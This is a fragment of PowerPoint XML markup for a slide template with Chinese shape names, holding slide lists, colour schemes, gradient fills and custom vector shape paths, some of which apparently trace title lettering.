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2"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId24"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId25"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="275" r:id="rId3"/>
    <p:sldId id="282" r:id="rId4"/>
    <p:sldId id="327" r:id="rId5"/>
    <p:sldId id="328" r:id="rId6"/>
    <p:sldId id="329" r:id="rId7"/>
    <p:sldId id="331" r:id="rId8"/>
    <p:sldId id="332" r:id="rId9"/>
    <p:sldId id="333" r:id="rId10"/>
    <p:sldId id="334" r:id="rId11"/>
    <p:sldId id="336" r:id="rId12"/>
    <p:sldId id="337" r:id="rId13"/>
    <p:sldId id="338" r:id="rId14"/>
    <p:sldId id="339" r:id="rId15"/>
    <p:sldId id="342" r:id="rId16"/>
    <p:sldId id="340" r:id="rId17"/>
    <p:sldId id="343" r:id="rId18"/>
    <p:sldId id="344" r:id="rId19"/>
    <p:sldId id="345" r:id="rId20"/>
    <p:sldId id="346" r:id="rId21"/>
    <p:sldId id="324" r:id="rId22"/>
    <p:sldId id="281" r:id="rId23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 荣鹏" initials="陈" lastIdx="1" clrIdx="0">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="43947089b92048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2418"/>
    <a:srgbClr val="780009"/>
    <a:srgbClr val="B4776D"/>
    <a:srgbClr val="BB010E"/>
    <a:srgbClr val="CC3300"/>
    <a:srgbClr val="CC4226"/>
    <a:srgbClr val="651B13"/>
    <a:srgbClr val="352850"/>
    <a:srgbClr val="885F04"/>
    <a:srgbClr val="192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410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F6B53-9E3B-4C54-8733-630783A95104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F0B8D-DCD7-4156-A67A-F9E102284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1D096-FAED-4D1A-B352-C58DC2C3D816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AA5F0-770B-410C-90B7-ECBA0CF902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96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153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617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39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156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204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574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239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585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678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8056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484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357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531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877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46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333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889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封面"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0" y="-14111"/>
            <a:ext cx="12192000" cy="6858001"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="bg1">
                  <a:alpha val="90000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="bg1">
                  <a:alpha val="70000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="1"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lt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-2" y="-26143"/>
            <a:ext cx="12192000" cy="3820891"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 12192000"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 3820891"/>
              <a:gd name="connsiteX1" fmla="*/ 12192000 w 12192000"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 3820891"/>
              <a:gd name="connsiteX2" fmla="*/ 12192000 w 12192000"/>
              <a:gd name="connsiteY2" fmla="*/ 2822842 h 3820891"/>
              <a:gd name="connsiteX3" fmla="*/ 11920340 w 12192000"/>
              <a:gd name="connsiteY3" fmla="*/ 2925857 h 3820891"/>
              <a:gd name="connsiteX4" fmla="*/ 6096000 w 12192000"/>
              <a:gd name="connsiteY4" fmla="*/ 3820891 h 3820891"/>
              <a:gd name="connsiteX5" fmla="*/ 271660 w 12192000"/>
              <a:gd name="connsiteY5" fmla="*/ 2925857 h 3820891"/>
              <a:gd name="connsiteX6" fmla="*/ 0 w 12192000"/>
              <a:gd name="connsiteY6" fmla="*/ 2822842 h 3820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820891">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12192000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12192000" y="2822842"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11920340" y="2925857"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10382026" y="3481957"/>
                  <a:pt x="8338529" y="3820891"/>
                  <a:pt x="6096000" y="3820891"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3853472" y="3820891"/>
                  <a:pt x="1809974" y="3481957"/>
                  <a:pt x="271660" y="2925857"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="2822842"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="9A24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 userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4825750" y="5851669"/>
            <a:ext cx="220164" cy="2201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 userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7146086" y="5851669"/>
            <a:ext cx="220164" cy="2201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文本占位符 56"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5222039" y="5792249"/>
            <a:ext cx="1747925" cy="353120"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1747925"/>
              <a:gd name="connsiteY0" fmla="*/ 176559 h 353120"/>
              <a:gd name="connsiteX1" fmla="*/ 0 w 1747925"/>
              <a:gd name="connsiteY1" fmla="*/ 176560 h 353120"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 1747925"/>
              <a:gd name="connsiteY2" fmla="*/ 176560 h 353120"/>
              <a:gd name="connsiteX3" fmla="*/ 176560 w 1747925"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 353120"/>
              <a:gd name="connsiteX4" fmla="*/ 1571365 w 1747925"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 353120"/>
              <a:gd name="connsiteX5" fmla="*/ 1747925 w 1747925"/>
              <a:gd name="connsiteY5" fmla="*/ 176560 h 353120"/>
              <a:gd name="connsiteX6" fmla="*/ 1747924 w 1747925"/>
              <a:gd name="connsiteY6" fmla="*/ 176560 h 353120"/>
              <a:gd name="connsiteX7" fmla="*/ 1571364 w 1747925"/>
              <a:gd name="connsiteY7" fmla="*/ 353120 h 353120"/>
              <a:gd name="connsiteX8" fmla="*/ 176560 w 1747925"/>
              <a:gd name="connsiteY8" fmla="*/ 353119 h 353120"/>
              <a:gd name="connsiteX9" fmla="*/ 13875 w 1747925"/>
              <a:gd name="connsiteY9" fmla="*/ 245284 h 353120"/>
              <a:gd name="connsiteX10" fmla="*/ 0 w 1747925"/>
              <a:gd name="connsiteY10" fmla="*/ 176560 h 353120"/>
              <a:gd name="connsiteX11" fmla="*/ 13875 w 1747925"/>
              <a:gd name="connsiteY11" fmla="*/ 107835 h 353120"/>
              <a:gd name="connsiteX12" fmla="*/ 176560 w 1747925"/>
              <a:gd name="connsiteY12" fmla="*/ 0 h 35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47925" h="353120">
                <a:moveTo>
                  <a:pt x="0" y="176559"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="176560"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="176560"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="176560" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1571365" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1668876" y="0"/>
                  <a:pt x="1747925" y="79049"/>
                  <a:pt x="1747925" y="176560"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1747924" y="176560"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1747924" y="274071"/>
                  <a:pt x="1668875" y="353120"/>
                  <a:pt x="1571364" y="353120"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="176560" y="353119"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="103427" y="353119"/>
                  <a:pt x="40679" y="308654"/>
                  <a:pt x="13875" y="245284"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="176560"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13875" y="107835"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="40679" y="44465"/>
                  <a:pt x="103427" y="0"/>
                  <a:pt x="176560" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="9A2418"/>
          </a:solidFill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58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81523" y="5407559"/>
            <a:ext cx="302895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59" name="副标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666750" y="4968911"/>
            <a:ext cx="10845800" cy="29627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0" name="标题 59"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="660400" y="4167394"/>
            <a:ext cx="10858500" cy="663575"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="4000" spc="100" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="9A2418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414" y="1564767"/>
            <a:ext cx="4767172" cy="12556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 userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-14400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90000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="bg1">
                  <a:alpha val="70000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="1"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9A24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任意多边形: 形状 59"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="0" y="-14288"/>
            <a:ext cx="12192000" cy="723900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solidFill>
            <a:srgbClr val="9A24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/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3785505" y="21431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 userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4726574" y="3432579"/>
            <a:ext cx="720000" cy="101600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="9A24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6574" y="2143126"/>
            <a:ext cx="6792326" cy="1035858"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="4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725988" y="3787775"/>
            <a:ext cx="6792912" cy="927100"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr spc="100" baseline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00" y="133581"/>
            <a:ext cx="1625600" cy="4281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 userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-14400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90000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="bg1">
                  <a:alpha val="70000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="1"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9A24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任意多边形: 形状 59"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="0" y="-14288"/>
            <a:ext cx="12192000" cy="723900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solidFill>
            <a:srgbClr val="9A24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00" y="133581"/>
            <a:ext cx="1625600" cy="4281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9625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90000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="bg1">
                  <a:alpha val="70000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="1"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lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="椭圆 3"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264695" y="121736"/>
            <a:ext cx="613610" cy="613026"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="9A24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0400" y="-1"/>
            <a:ext cx="9301747" cy="817564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6666252"/>
            <a:ext cx="12192000" cy="288000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="9A24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635" y="238879"/>
            <a:ext cx="1872876" cy="4932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底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0152" y="1137493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90000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="bg1">
                  <a:alpha val="70000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="1"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lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="PA-任意多边形 56"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1">
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-10152" y="0"/>
            <a:ext cx="12192000" cy="4747499"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 12192000"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 4747499"/>
              <a:gd name="connsiteX1" fmla="*/ 12192000 w 12192000"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 4747499"/>
              <a:gd name="connsiteX2" fmla="*/ 12192000 w 12192000"/>
              <a:gd name="connsiteY2" fmla="*/ 926608 h 4747499"/>
              <a:gd name="connsiteX3" fmla="*/ 12192000 w 12192000"/>
              <a:gd name="connsiteY3" fmla="*/ 1179983 h 4747499"/>
              <a:gd name="connsiteX4" fmla="*/ 12192000 w 12192000"/>
              <a:gd name="connsiteY4" fmla="*/ 3749450 h 4747499"/>
              <a:gd name="connsiteX5" fmla="*/ 11920340 w 12192000"/>
              <a:gd name="connsiteY5" fmla="*/ 3852465 h 4747499"/>
              <a:gd name="connsiteX6" fmla="*/ 6096000 w 12192000"/>
              <a:gd name="connsiteY6" fmla="*/ 4747499 h 4747499"/>
              <a:gd name="connsiteX7" fmla="*/ 271660 w 12192000"/>
              <a:gd name="connsiteY7" fmla="*/ 3852465 h 4747499"/>
              <a:gd name="connsiteX8" fmla="*/ 0 w 12192000"/>
              <a:gd name="connsiteY8" fmla="*/ 3749450 h 4747499"/>
              <a:gd name="connsiteX9" fmla="*/ 0 w 12192000"/>
              <a:gd name="connsiteY9" fmla="*/ 1179983 h 4747499"/>
              <a:gd name="connsiteX10" fmla="*/ 0 w 12192000"/>
              <a:gd name="connsiteY10" fmla="*/ 926608 h 474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747499">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12192000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12192000" y="926608"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12192000" y="1179983"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12192000" y="3749450"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11920340" y="3852465"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10382026" y="4408565"/>
                  <a:pt x="8338529" y="4747499"/>
                  <a:pt x="6096000" y="4747499"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3853472" y="4747499"/>
                  <a:pt x="1809974" y="4408565"/>
                  <a:pt x="271660" y="3852465"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="3749450"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1179983"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="926608"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="9A24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PA-文本框 55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1">
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2234590" y="1982981"/>
            <a:ext cx="7722821" cy="1016280"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7722821" h="1016280">
                <a:moveTo>
                  <a:pt x="6328591" y="239823"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6273187" y="630821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6383997" y="630821"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="1537517" y="239823"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1482112" y="630821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1592922" y="630821"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="5426443" y="165422"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5426443" y="482812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5516673" y="482812"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5540418" y="482812"/>
                  <a:pt x="5560602" y="474369"/>
                  <a:pt x="5577223" y="457484"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5593844" y="440599"/>
                  <a:pt x="5602155" y="420284"/>
                  <a:pt x="5602155" y="396539"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5602155" y="251695"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5602155" y="194180"/>
                  <a:pt x="5573661" y="165422"/>
                  <a:pt x="5516673" y="165422"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4861850" y="148801"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="4838105" y="148801"/>
                  <a:pt x="4817790" y="157112"/>
                  <a:pt x="4800905" y="173733"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4784020" y="190354"/>
                  <a:pt x="4775577" y="210538"/>
                  <a:pt x="4775577" y="234282"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4775577" y="777248"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4775577" y="800993"/>
                  <a:pt x="4784020" y="821176"/>
                  <a:pt x="4800905" y="837797"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4817790" y="854419"/>
                  <a:pt x="4838105" y="862730"/>
                  <a:pt x="4861850" y="862730"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4885595" y="862730"/>
                  <a:pt x="4905778" y="854419"/>
                  <a:pt x="4922399" y="837797"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4939021" y="821176"/>
                  <a:pt x="4947331" y="800993"/>
                  <a:pt x="4947331" y="777248"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4947331" y="234282"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4947331" y="210538"/>
                  <a:pt x="4939021" y="190354"/>
                  <a:pt x="4922399" y="173733"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4905778" y="157112"/>
                  <a:pt x="4885595" y="148801"/>
                  <a:pt x="4861850" y="148801"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7315201" y="12664"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7464793" y="12664"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7464793" y="855606"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7722821" y="855606"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7722821" y="1004407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7315201" y="1004407"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="6762750" y="12664"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6912343" y="12664"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6912343" y="855606"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7170371" y="855606"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7170371" y="1004407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6762750" y="1004407"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="6226501" y="12664"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6432277" y="12664"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6598479" y="1004407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6441194" y="1004407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6406195" y="776457"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6250011" y="776457"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6213665" y="1004407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6057901" y="1004407"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="5276850" y="12664"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5512716" y="12664"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5596087" y="12664"/>
                  <a:pt x="5657296" y="35617"/>
                  <a:pt x="5696343" y="81524"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5730641" y="121626"/>
                  <a:pt x="5747790" y="177559"/>
                  <a:pt x="5747790" y="249321"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5747790" y="393373"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5747790" y="463552"/>
                  <a:pt x="5721143" y="522914"/>
                  <a:pt x="5667849" y="571459"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5778646" y="1004407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5616872" y="1004407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5526171" y="630821"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5521950" y="630821"/>
                  <a:pt x="5517465" y="630821"/>
                  <a:pt x="5512716" y="630821"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5426443" y="630821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5426443" y="1004407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5276850" y="1004407"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="1435426" y="12664"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1641203" y="12664"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1807405" y="1004407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1650119" y="1004407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1615120" y="776457"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1458936" y="776457"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1422589" y="1004407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1266826" y="1004407"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="628650" y="12664"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="778243" y="12664"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="778243" y="433739"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="958704" y="433739"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="958704" y="12664"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1108297" y="12664"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1108297" y="1004407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="958704" y="1004407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="958704" y="584123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="778243" y="584123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="778243" y="1004407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="628650" y="1004407"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="0" y="12664"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="466983" y="12664"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="466983" y="163048"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="308684" y="163048"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="308684" y="1004407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="159091" y="1004407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="159091" y="163048"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="163048"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4057651" y="11872"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4483475" y="11872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4483475" y="162256"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4207243" y="162256"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4207243" y="432948"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4409074" y="432948"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4409074" y="583332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4207243" y="583332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4207243" y="1004407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4057651" y="1004407"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2657476" y="11872"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2807068" y="11872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2807068" y="365671"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2989903" y="11872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3149390" y="11872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2944627" y="416710"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3184747" y="1004407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3008899" y="1004407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2851837" y="601437"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2807068" y="689788"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2807068" y="1004407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2657476" y="1004407"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="1971676" y="11872"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2139621" y="11872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2338138" y="678917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2338138" y="11872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2487730" y="11872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2487730" y="1004407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2327057" y="1004407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2121268" y="368837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2121268" y="1004407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1971676" y="1004407"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4865807" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="4931765" y="0"/>
                  <a:pt x="4987830" y="23217"/>
                  <a:pt x="5034000" y="69651"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5080171" y="116086"/>
                  <a:pt x="5103256" y="172018"/>
                  <a:pt x="5103256" y="237448"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5103256" y="778831"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5103256" y="844789"/>
                  <a:pt x="5080039" y="900853"/>
                  <a:pt x="5033605" y="947024"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4987170" y="993194"/>
                  <a:pt x="4931238" y="1016280"/>
                  <a:pt x="4865807" y="1016280"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4799850" y="1016280"/>
                  <a:pt x="4743917" y="993062"/>
                  <a:pt x="4698011" y="946628"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4652104" y="900194"/>
